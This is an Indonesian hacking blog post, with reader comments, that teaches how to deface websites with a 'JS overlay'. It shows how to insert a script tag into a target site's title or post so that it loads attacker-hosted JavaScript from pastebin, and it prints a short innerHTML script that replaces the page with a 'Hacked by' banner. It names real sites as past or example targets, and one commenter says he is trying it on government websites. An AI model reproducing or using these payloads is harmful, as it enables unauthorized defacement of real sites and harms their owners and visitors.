• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Tutorial Deface – Menutup Halaman Depan Situs Target dengan JS Overlay

April 3, 2013 by Jack Wilder 34 Comments

Tutorial Deface – Menutup Halaman Depan Situs Target dengan JS Overlay – Kali ini saya akan share teknik deface yang “jarang” digunakan karena ini mungkin menjadi alternatif terakhir jika kita gagal memasang shell pada web target. Ada kalanya sebuah web tidak support file php [kalo ini masih bisa di tamper], atau Web tersebut tidak menyediakan fasilitas upload. Cara yang bisa kita pakai adalah menutup halaman depan dengan sebuah “evil” javascript. Teknik ini pernah digunakan saat situs 1CAK, Babymetal, dan IPB di deface.

Sistem kerjanya berbeda dengan teknik deface yang didahului dengan mengupload shell. Jika shell diupload, maka biasanya script asli yang diganti. Namun untuk JS Overlay, halaman asli web tersebut “ditimpa” oleh halaman deface yang kita buat. Jadi halaman asli tersebut tetap ada namun ditutup oleh script deface kita. Caranya ?
Sebelumnya kalian membutuhkan script deface yang sudah tertanam di web lain. Jika sebelumnya belum pernah melakukan deface, kalian bisa mengupload di hosting kalian. Ini hanya untuk “umpan” agar tampilan deface kita tampil di web target.
Selain source script deface, kalian juga membutuhkan evil script yang tertanam di web lain. Bisa diupload juga di pastebin. Untuk contoh scriptnya bisa kalian download disini: Script JS Overlay
Silahkan modifikasi sendiri bagian “Hacked by” dan source deface nya. Untuk halaman defacement nya, disini saya menggunakan script HTML yang sudah termirror di zone-h.org . Edit bagian :
  • http://zonehmirrors.org/defaced/2016/10/22/msdental.com.br/msdental.com.br/k.php
Sebagai contoh, target kita kali ini adalah Lokomedia. Seharusnya bisa upload shell. namun sudah saya coba berkali-kali tidak bisa. Mungkin sudah diantisipasi oleh Webmasternya. Makanya saya coba menggunakan metode JS Overlay.
Oke, kita mulai tutorialnya :
Login ke web target. Buat post baru/kalian bisa mengedit judul/nama dari web tersebut. Masukkan script ini di bagian judul :
<script type="text/javascript" src="https://pastebin.com/raw/raJBgjmU"></script>
Untuk tulisan berwarna merah silahkan diganti dengan url kalian sendiri. Intinya kita memanggil script dari url tersebut untuk menutupi halaman yang akan kita deface.
Setelah di save, kita coba buka situs yang telah di tanam script js overlay tadi.
Teknik ini bisa digunakan di semua CMS. Entah itu Lokomedia, Joomla, WP, dll. Kekurangannya, kita tidak punya akses ke server karena tidak ada backdoor yang tertanam.Thanks to BagsFreakz from Surabaya Blackhat .

Script JS Overlay Simple

Nah yang kedua ini adalah script simple yang saya buat sendiri. Fungsinya sama seperti script sebelumnya, hanya saja yang ini lebih simple karena hanya memanfaatkan elemen innerHTML saja. Berikut contoh scriptnya

document.title="Hacked by LinuxSec";
document.body.style.backgroundColor = "#000000";
document.body.innerHTML = "<html><body style='background-color: black'><center><h1><b style='color: white'>Hacked by LinuxSec<p style='color: transparent'><title>Hacked by Nabilaholic404</title></html>";

Sama seperti sebelumnya, edit pada bagian yang ingin diedit, lalu upload ke pastebin. Untuk menggunakannya cukup panggil dengan kode html biasa. Contoh:

<script type="text/javascript" src="https://pastebin.com/raw/e54wNKNs"></script>

Output:

Done. Mudah bukan? Sekian tutorial kali ini, gunakan dengan bijak.

Shares

Filed Under: Web Hacking Tagged With: Deface, Hacking

Reader Interactions

Comments

  1. cik awi says

    April 3, 2013 at 11:18 pm

    Wah bisa Jadi master hack bener lama lama loh sob. Tapi saya gak berani coba ntar takut kualat

    Reply
    • chiaki says

      April 4, 2013 at 2:48 am

      Belajar kok kualat ? :p

      Reply
  2. Rohis Facebook says

    April 3, 2013 at 11:36 pm

    nyimak sambil belum mandi heheh….

    Reply
    • chiaki says

      April 4, 2013 at 2:49 am

      Waduh, stengah7 lho.

      Reply
  3. Masnady says

    April 4, 2013 at 12:55 am

    saya setuju sama komentar di atas @cik awi, hehehe lama lama sobat bisa jadi master hack nih. wah okelah. saya bisa belajar banyak nih ntr sama sobat. hehehehe

    Reply
    • chiaki says

      April 4, 2013 at 2:50 am

      Saya cuma pemula. . . Hehehe

      Reply
  4. Muro'i El-Barezy says

    April 4, 2013 at 1:38 am

    mampir pagi hari sob, selamat beraktifitas dan happy blogging

    Reply
    • chiaki says

      April 4, 2013 at 3:07 am

      Oke. Thx

      Reply
  5. Abed Saragih says

    April 4, 2013 at 2:31 am

    Semakin hari semakin keren aja tutorial yang diberikan sobat satu ini haha 🙂

    Reply
    • chiaki says

      April 4, 2013 at 3:09 am

      Basic doang. . .

      Reply
  6. Etika Maria says

    April 4, 2013 at 3:24 am

    Belum ngerti, hehehehe…
    macem jaringan aja aku ini.. LALOAD hehehe 🙂

    Reply
    • chiaki says

      April 4, 2013 at 8:15 am

      hahahaha

      Reply
  7. Bung Penho says

    April 4, 2013 at 3:24 am

    pelajaran pertempuran dunia maya di blog ini makin hot aja hehehe..!

    Reply
    • chiaki says

      April 4, 2013 at 8:15 am

      bisa aja sob.. hehehehehe

      Reply
  8. Deby Putra Bahrodin says

    April 4, 2013 at 4:48 am

    heker heker, awas minggir2 … Hohohoho..
    Lanjutkan mas brooo….

    Reply
    • chiaki says

      April 4, 2013 at 8:17 am

      wah,, saya cuma lamer kok… :v

      Reply
  9. cak oni says

    April 4, 2013 at 6:33 am

    waawar ala dunia maya nih

    Reply
    • chiaki says

      April 4, 2013 at 8:18 am

      ini cuma sebagai pembelajaran doang .. hehehehehe

      Reply
  10. Riev - Bapo says

    April 4, 2013 at 6:58 am

    bisa belajar menjadi hacker nih
    hehe

    Reply
    • chiaki says

      April 4, 2013 at 8:18 am

      :v

      Reply
  11. Djangkaru Bumi says

    April 5, 2013 at 2:02 pm

    Saya belum berani menanggung resiko, cuma numpang nyimak saja dulu.

    Reply
    • chiaki says

      April 10, 2013 at 3:31 am

      Oke . :v

      Reply
  12. Forbidden 007 says

    June 8, 2013 at 2:34 pm

    ijin nyoba gan 😀 web pemerintah :v

    Reply
  13. nono says

    June 11, 2013 at 2:40 am

    kalau tutorial yang pakai backtrack ada mas ???

    Reply
    • chiaki says

      June 23, 2013 at 9:00 pm

      ini kan eksekusinya di web korban. sama aja lah kek windows. -_-

      Reply
  14. Anonim says

    July 1, 2013 at 12:21 am

    mas, tolong lagunya diilangin biar enak bacanya

    Reply
  15. Anonim says

    August 27, 2013 at 12:37 pm

    login dulu?
    login pake apa :v

    Reply
  16. Anonim says

    February 11, 2014 at 8:50 am

    apaan orang di joomla gk bisa azzz nipu

    Reply
  17. muhammad riki potay says

    July 15, 2014 at 8:19 am

    inurl:il/index.php/[?????]

    Reply
  18. gial says

    March 24, 2019 at 8:51 pm

    Err0r SquaD

    Reply
  19. Vbhh says

    March 30, 2019 at 10:40 pm

    Reply
  20. Indra says

    May 19, 2019 at 10:31 pm

    mntp ni blognya

    Reply
  21. sas says

    August 12, 2019 at 1:45 pm

    Reply
  22. As7 says

    December 24, 2022 at 3:18 pm

    Haii kak untuk menjadi planet Neptunus yang telah berpartisipasi dalam kayu yang telah berpartisipasi

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Deface dengan Metode Timthumb Remote Code Execution

Laravel PHPUnit Remote Code Execution

Open Redirect Bypass Cheat Sheet

Exploit WPStore Themes Upload Vulnerability

Cracking FTP Password using Hydra on BackBox Linux

Tool Deface Opencart Bruteforce and Upload Image

Upload Backdoor Lewat MySQL Database (phpMyAdmin)

Bruteforce FTP Login dengan Metasploit Module FTP Authentication Scanner

Deface WordPress dengan Exploit WordPress TheLoft Theme Arbitrary File Download Vulnerability

Cara Deface dengan Exploit Slims CMS Senayan Arbitrary File Upload Vulnerability

LinuxSec / 86 queries in 2.50 seconds